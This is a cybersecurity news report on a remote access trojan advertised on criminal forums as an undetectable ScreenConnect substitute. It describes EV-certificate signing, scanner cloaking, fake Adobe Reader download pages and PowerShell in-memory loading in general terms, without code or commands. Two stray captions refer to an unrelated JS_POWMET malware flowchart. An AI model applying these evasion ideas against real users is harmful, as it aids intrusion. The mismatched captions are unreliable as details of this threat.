Threat Actors Market Stealthy New RAT as Alternative to ScreenConnect FUD

Cybersecurity researchers have identified a concerning development in the underground cybercrime marketplace: a sophisticated Remote Access Trojan (RAT) being marketed as a fully undetectable (FUD) alternative to the legitimate ScreenConnect remote access solution.

This emerging threat represents a significant escalation in the professionalization of malware-as-a-service operations, with threat actors specifically targeting the trust associated with established remote administration tools.

The malware’s primary selling proposition centers on its ability to completely bypass security warnings from both Google Chrome and Windows SmartScreen, two critical security barriers that typically protect users from malicious downloads.

According to underground forum advertisements, this evasion is achieved through the bundling of malware with valid Extended Validation (EV) certificates—high-assurance digital certificates that browsers typically display with enhanced visual trust indicators.

The threat actors have developed a comprehensive evasion toolkit that includes antibot mechanisms and cloaked landing pages.

These sophisticated features enable the malware to present benign content to automated security scanners and sandbox environments while simultaneously delivering malicious payloads to genuine targets.

This dual-presentation capability represents a significant advancement in automated analysis evasion techniques.

Common fileless attack methods include using PowerShell, phishing emails, malicious links, and legitimate-looking websites to deliver malware without traditional files 

The delivery mechanism showcases professional-grade social engineering, with threat actors creating convincing fake Adobe Acrobat Reader download pages.

This approach leverages users’ familiarity with legitimate software updates to facilitate initial compromise, demonstrating how attackers continue to exploit trusted brands for malicious purposes.

ScreenConnect FUD

Technical analysis reveals that the RAT employs fileless execution techniques, primarily utilizing PowerShell-based commands to load its executable payload directly into memory.

This approach allows the malware to operate without writing persistent files to disk, significantly reducing its detectability by traditional antivirus solutions that rely on file-based scanning mechanisms.

The remote access capabilities include a comprehensive remote viewer function, granting attackers real-time visual control over compromised systems.

This functionality enables continuous monitoring, interactive data exfiltration, and dynamic system manipulation without requiring additional tool deployment.

Flowchart showing the infection chain of the JS_POWMET fileless malware and delivery of the BKDR_ANDROM payload. 

The threat actor’s sales approach demonstrates a highly organized cybercrime-as-a-service model. Advertisements explicitly position the tool as a “FUD loader,” indicating its intended use as a primary infection vector for establishing persistent system access before deploying secondary payloads such as ransomware, banking trojans, or espionage tools.

The seller’s promise of demo availability and 24-hour delivery timelines suggests a mature operational infrastructure designed to support scalable malware distribution.

This professional approach mirrors legitimate software sales models, highlighting the increasing sophistication of cybercriminal enterprises.

Growing Threat Landscape

This development reflects broader trends in the cyberthreat landscape, where attackers increasingly focus on exploiting user trust in legitimate brands and circumventing modern security technologies.

The specific targeting of ScreenConnect reputation indicates that threat actors are systematically identifying and exploiting trust relationships between users and established remote access solutions.

The integration of valid EV certificates with malicious payloads represents a particularly concerning evolution, as it directly undermines one of the internet’s fundamental trust mechanisms.

This technique could potentially scale across multiple attack campaigns, making detection significantly more challenging for both automated systems and end users.

Security professionals should anticipate increased instances of legitimate brand impersonation and enhanced evasion techniques as threat actors continue professionalizing their operations.

Organizations utilizing remote access tools should implement additional verification procedures and maintain heightened awareness of social engineering attempts targeting their trusted software relationships.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.